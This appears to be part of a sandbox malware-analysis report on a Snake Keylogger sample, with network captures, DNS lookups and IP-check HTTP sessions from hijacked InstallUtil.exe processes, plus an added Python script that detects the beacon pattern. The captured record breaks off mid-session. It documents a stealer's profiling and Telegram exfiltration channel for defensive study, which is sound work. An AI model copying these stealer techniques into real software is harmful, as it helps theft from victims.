                                                                                                                                                                    Mar 11, 2025 06:10:46.749979019 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:48.688457012 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:48.690203905 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:48.690253019 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.188817024 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.212374926 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.212505102 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.212956905 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.235582113 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.236691952 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.241055965 CET8049747158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.241131067 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.241580009 CET8049749158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.241641998 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.241878033 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.246718884 CET8049749158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.821760893 CET8049749158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.827111006 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.827159882 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.827224016 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.836088896 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.836116076 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.872706890 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:51.674071074 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:51.675717115 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:51.675748110 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:51.720437050 CET4975125192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:10:51.720566034 CET4971580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:52.152093887 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:52.152172089 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:52.152242899 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:52.152668953 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:52.163111925 CET4974980192.168.2.5158.101.44.242
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Mar 11, 2025 06:09:58.183087111 CET  192.168.2.5  1.1.1.1  0x2b24    Standard query (0)  checkip.dyndns.org       A (IP address)  IN (0x0001)  false
Mar 11, 2025 06:09:59.174424887 CET  192.168.2.5  1.1.1.1  0xfa64    Standard query (0)  reallyfreegeoip.org      A (IP address)  IN (0x0001)  false
Mar 11, 2025 06:10:43.354370117 CET  192.168.2.5  1.1.1.1  0x2522    Standard query (0)  api.telegram.org         A (IP address)  IN (0x0001)  false
Mar 11, 2025 06:10:51.709068060 CET  192.168.2.5  1.1.1.1  0xbd97    Standard query (0)  mail.iaa-airferight.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                     CName / Address     Type                    Class        DNS over HTTPS
Mar 11, 2025 06:09:58.189814091 CET  1.1.1.1    192.168.2.5  0x2b24    No error (0)  checkip.dyndns.org       checkip.dyndns.com  CNAME (Canonical name)  IN (0x0001)  false
Mar 11, 2025 06:09:58.189814091 CET  1.1.1.1    192.168.2.5  0x2b24    No error (0)  checkip.dyndns.com       158.101.44.242      A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:58.189814091 CET  1.1.1.1    192.168.2.5  0x2b24    No error (0)  checkip.dyndns.com       193.122.130.0       A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:58.189814091 CET  1.1.1.1    192.168.2.5  0x2b24    No error (0)  checkip.dyndns.com       132.226.8.169       A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:58.189814091 CET  1.1.1.1    192.168.2.5  0x2b24    No error (0)  checkip.dyndns.com       193.122.6.168       A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:58.189814091 CET  1.1.1.1    192.168.2.5  0x2b24    No error (0)  checkip.dyndns.com       132.226.247.73      A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:59.184005022 CET  1.1.1.1    192.168.2.5  0xfa64    No error (0)  reallyfreegeoip.org      104.21.96.1         A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:59.184005022 CET  1.1.1.1    192.168.2.5  0xfa64    No error (0)  reallyfreegeoip.org      104.21.48.1         A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:59.184005022 CET  1.1.1.1    192.168.2.5  0xfa64    No error (0)  reallyfreegeoip.org      104.21.64.1         A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:59.184005022 CET  1.1.1.1    192.168.2.5  0xfa64    No error (0)  reallyfreegeoip.org      104.21.80.1         A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:59.184005022 CET  1.1.1.1    192.168.2.5  0xfa64    No error (0)  reallyfreegeoip.org      104.21.32.1         A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:59.184005022 CET  1.1.1.1    192.168.2.5  0xfa64    No error (0)  reallyfreegeoip.org      104.21.112.1        A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:09:59.184005022 CET  1.1.1.1    192.168.2.5  0xfa64    No error (0)  reallyfreegeoip.org      104.21.16.1         A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:10:43.361470938 CET  1.1.1.1    192.168.2.5  0x2522    No error (0)  api.telegram.org         149.154.167.220     A (IP address)          IN (0x0001)  false
Mar 11, 2025 06:10:51.719671965 CET  1.1.1.1    192.168.2.5  0xbd97    No error (0)  mail.iaa-airferight.com  46.175.148.58       A (IP address)          IN (0x0001)  false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49712        158.101.44.242  80                8068  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2025 06:09:58.201845884 CET  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Mar 11, 2025 06:09:58.804289103 CET  321                IN         HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 05:09:58 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 32470de83870363cc07df7c112ff262f
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 06:09:58.809731007 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Mar 11, 2025 06:09:58.969089031 CET  321                IN         HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 05:09:58 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 262c9d68585d47dc95266f3d0c60061a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 06:10:01.540587902 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Mar 11, 2025 06:10:04.818378925 CET  321                IN         HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 05:10:04 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 3289b0b94bdd1d2e85d86153af374771
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49715        158.101.44.242  80                8068  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2025 06:10:07.197340012 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Mar 11, 2025 06:10:16.672739983 CET  321                IN         HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 05:10:16 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: abb891f7b2c22e592b1699bf80874c9c
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49716        158.101.44.242  80                7500  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2025 06:10:10.494441032 CET  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Mar 11, 2025 06:10:18.796195030 CET  321                IN         HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 05:10:18 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: aeb2afb853333e428eba3ef7b74f700d
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 06:10:18.799894094 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Mar 11, 2025 06:10:24.057415009 CET  321                IN         HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 05:10:23 GMT
    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 8419d03a7368bf471f61d8fef0671484
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Mar 11, 2025 06:10:26.454727888 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Mar 11, 2025 06:10:27.801373005 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:27 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: e5d0c04f9f3acc73fb64cc9725911e8d
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49721 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 8068 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Mar 11, 2025 06:10:18.928136110 CET | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Mar 11, 2025 06:10:24.490513086 CET | Bytes transferred: 321 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ffea57a928991934d8af846414139f1d
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49725 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 8068 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Mar 11, 2025 06:10:26.719578028 CET | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Mar 11, 2025 06:10:28.659517050 CET | Bytes transferred: 321 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4746b0d51743a96a37ed3f51156c76c9
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49728 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7500 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Mar 11, 2025 06:10:30.015328884 CET | Bytes transferred: 127 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Timestamp: Mar 11, 2025 06:10:30.665066004 CET | Bytes transferred: 321 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:30 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c80ff8847ec6660db5ec25ad3d99e751
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49730 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 8068 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Mar 11, 2025 06:10:30.822541952 CET | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Mar 11, 2025 06:10:31.433689117 CET | Bytes transferred: 321 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7d45246160f0f72128c2095ce025a47d
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7500 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Mar 11, 2025 06:10:34.061528921 CET | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Mar 11, 2025 06:10:34.633016109 CET | Bytes transferred: 321 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2eafc63cc3080f50b077872485152aed
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49733 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 8068 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Mar 11, 2025 06:10:34.115523100 CET | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Mar 11, 2025 06:10:34.715038061 CET | Bytes transferred: 321 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8f84cbaa1bd1278bb8d776cdc785e583
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49736 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7500 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Mar 11, 2025 06:10:37.177220106 CET | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Mar 11, 2025 06:10:37.769226074 CET | Bytes transferred: 321 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 70acf502f22fad00b7592be3c8743b8d
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49737 | 158.101.44.242 | 80 | 8068 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2025 06:10:37.180102110 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Mar 11, 2025 06:10:37.753390074 CET | 321 | IN | HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ad86322b966b36c30a1959666ed6d08a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49740 | 158.101.44.242 | 80 | 7500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2025 06:10:40.130079985 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Mar 11, 2025 06:10:40.711698055 CET | 321 | IN | HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:40 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c32cb74fd4f1cdb4184554093a0419b4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49741 | 158.101.44.242 | 80 | 8068 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2025 06:10:40.130145073 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Mar 11, 2025 06:10:40.713644981 CET | 321 | IN | HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 05:10:40 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 48a3ea446f674bc03b63d1690172004a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
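
The four sessions above are the sample's external-IP lookup: two injected InstallUtil.exe processes (PIDs 7500 and 8068) each fetch checkip.dyndns.org twice within three seconds, using a hard-coded MSIE 6.0 User-Agent, and receive the analysis host's public address, which Snake Keylogger puts into the victim profile it later sends over the Telegram API. checkip.dyndns.org itself is also queried by benign software, so a useful detection keys on the combination: the legacy User-Agent, the .NET Framework utility as the requesting process, and the repeated requests. The script below is an added example and not part of the Joe Sandbox report or the sample; it rebuilds the response body from the report's "Data Raw" hex dump, extracts the IP the stealer learned, and applies that combined check to session records constructed from sessions 9 to 12 (the field names, indicator labels and the 10-second window are my own choices).

```python
"""Triage of the checkip.dyndns.org sessions shown in this report.

Added example (not part of the Joe Sandbox report). The session records are
constructed from sessions 9-12 above; field names and thresholds are my own.
"""
import re
from datetime import datetime
from typing import Dict, List, Optional

# User-Agent hard-coded in the sample's IP-check request (copied from the report).
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IP_CHECK_HOSTS = {"checkip.dyndns.org"}
# .NET Framework utilities commonly hollowed by .NET loaders; none of them has a
# legitimate reason to query an external-IP service.
DOTNET_UTILITIES = {"installutil.exe", "regsvcs.exe", "regasm.exe", "msbuild.exe"}
PROCESS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

# "Data Raw" line of the 200 OK response (session 9 in the report).
DATA_RAW = (
    "3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 "
    "20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 "
    "6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e "
    "34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a"
)

# Constructed from sessions 9-12; timestamps truncated to microseconds for strptime.
SESSIONS = [
    {"id": 9,  "ts": "2025-03-11 06:10:37.177220", "sport": 49736, "pid": 7500,
     "process": PROCESS, "host": "checkip.dyndns.org", "ua": LEGACY_UA, "data_raw": DATA_RAW},
    {"id": 10, "ts": "2025-03-11 06:10:37.180102", "sport": 49737, "pid": 8068,
     "process": PROCESS, "host": "checkip.dyndns.org", "ua": LEGACY_UA, "data_raw": DATA_RAW},
    {"id": 11, "ts": "2025-03-11 06:10:40.130079", "sport": 49740, "pid": 7500,
     "process": PROCESS, "host": "checkip.dyndns.org", "ua": LEGACY_UA, "data_raw": DATA_RAW},
    {"id": 12, "ts": "2025-03-11 06:10:40.130145", "sport": 49741, "pid": 8068,
     "process": PROCESS, "host": "checkip.dyndns.org", "ua": LEGACY_UA, "data_raw": DATA_RAW},
]

IP_RE = re.compile(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")


def decode_data_raw(hex_line: str) -> str:
    """Turn the report's space-separated hex dump back into the response body."""
    return bytes.fromhex("".join(hex_line.split())).decode("ascii", errors="replace")


def reported_ip(hex_line: str) -> Optional[str]:
    """Public IP the victim learned about itself (what the stealer later exfiltrates)."""
    m = IP_RE.search(decode_data_raw(hex_line))
    return m.group(1) if m else None


def session_findings(s: dict) -> List[str]:
    """Per-session indicators; any one alone is weak, the combination is not."""
    found = []
    if s["host"].lower() in IP_CHECK_HOSTS:
        found.append("ip-check-host")
    if s["ua"] == LEGACY_UA:
        found.append("legacy-msie6-ua")
    if s["process"].rsplit("\\", 1)[-1].lower() in DOTNET_UTILITIES:
        found.append("dotnet-utility-beacon")
    return found


def triage(sessions: List[dict], window_s: float = 10.0, min_hits: int = 2) -> Dict:
    """Group indicators by PID and flag PIDs that beacon min_hits times inside window_s."""
    per_pid: Dict[int, dict] = {}
    exposed = set()
    for s in sessions:
        findings = session_findings(s)
        ip = reported_ip(s["data_raw"])
        if ip:
            exposed.add(ip)
        if not findings:
            continue
        entry = per_pid.setdefault(
            s["pid"], {"process": s["process"], "findings": set(), "times": []})
        entry["findings"].update(findings)
        entry["times"].append(datetime.strptime(s["ts"], "%Y-%m-%d %H:%M:%S.%f"))
    for entry in per_pid.values():
        t = sorted(entry.pop("times"))
        entry["repeated_beacon"] = any(
            (t[i + min_hits - 1] - t[i]).total_seconds() <= window_s
            for i in range(len(t) - min_hits + 1)
        )
        entry["findings"] = sorted(entry["findings"])
    return {"exposed_ip": sorted(exposed), "pids": per_pid}


if __name__ == "__main__":
    result = triage(SESSIONS)
    print("IP handed to the stealer:", result["exposed_ip"])
    for pid, entry in result["pids"].items():
        print(pid, entry["process"], entry["findings"],
              "burst" if entry["repeated_beacon"] else "")
```

Run against the four constructed sessions, both PIDs come back with all three indicators and the burst flag set, and the exposed address is 8.46.123.189, the value the sandbox itself reported. On a real host the same logic belongs on the proxy or Zeek http.log rather than on a sandbox dump, and the process name comes from endpoint telemetry joined on source port; the User-Agent alone is not a safe signature, since the string is a generic .NET 1.0-era default that some legitimate legacy clients still send.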


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49744 | 158.101.44.242 | 80 | 7500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2025 06:10:43.201354027 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (